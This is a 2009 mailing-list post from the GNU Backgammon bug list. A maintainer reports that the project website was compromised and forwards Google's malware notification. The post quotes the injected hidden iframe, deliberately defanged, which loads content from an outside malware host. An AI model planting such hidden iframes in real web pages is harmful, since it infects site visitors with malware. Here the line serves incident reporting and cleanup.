Hi again, I just did a quick check at the webpage. The file index.php contains the line
<i_frame src="http://39t.ru:8080/index.php" width=103 height=140 style="visibility: hidden"></i_frame> Note: I had to change the tag to" i_frame" because the otherwise would not be send. At first glance no other files or directories are hurt but Oytsein and I probably need to take a deeper look. Ciao Achim On Sat, Aug 15, 2009 at 5:13 AM, Mueller Achim <a...@gnubg.org> wrote: > > > Anfang der weitergeleiteten E-Mail: > > *Von: *nore...@google.com > *Datum: *15. August 2009 02:12:16 MESZ > *An: *ab...@gnubg.org, ad...@gnubg.org, administra...@gnubg.org, > cont...@gnubg.org, i...@gnubg.org, postmas...@gnubg.org, > supp...@mail.bytecamp.net, webmas...@gnubg.org > *Betreff: **Malware notification regarding gnubg.org* > > Dear site owner or webmaster of gnubg.org, > > We recently discovered that some of your pages can cause users to be > infected with malicious software. We have begun showing a warning page to > users who visit these pages by clicking a search result on Google.com. > > Below are some example URLs on your site which can cause users to be > infected (space inserted to prevent accidental clicking in case your mail > client auto-links URLs): > > http://gnubg .org/ > http://www.gnubg .org/ > http://www.gnubg .org/index.php?catid=10 > > Here is a link to a sample warning page: > http://www.google.com/interstitial?url=http%3A//gnubg.org/ > > We strongly encourage you to investigate this immediately to protect your > visitors. Although some sites intentionally distribute malicious software, > in many cases the webmaster is unaware because: > > 1) the site was compromised > 2) the site doesn't monitor for malicious user-contributed content > 3) the site displays content from an ad network that has a malicious > advertiser > > If your site was compromised, it's important to not only remove the > malicious (and usually hidden) content from your pages, but to also identify > and fix the vulnerability. We suggest contacting your hosting provider if > you are unsure of how to proceed. StopBadware also has a resource page for > securing compromised sites: > http://www.stopbadware.org/home/security > > Once you've secured your site, you can request that the warning be removed > by visiting > http://www.google.com/support/webmasters/bin/answer.py?answer=45432 > and requesting a review. If your site is no longer harmful to users, we > will remove the warning. > > Sincerely, > Google Search Quality Team > > > > _______________________________________________ > Bug-gnubg mailing list > Bug-gnubg@gnu.org > http://lists.gnu.org/mailman/listinfo/bug-gnubg > >
_______________________________________________ Bug-gnubg mailing list Bug-gnubg@gnu.org http://lists.gnu.org/mailman/listinfo/bug-gnubg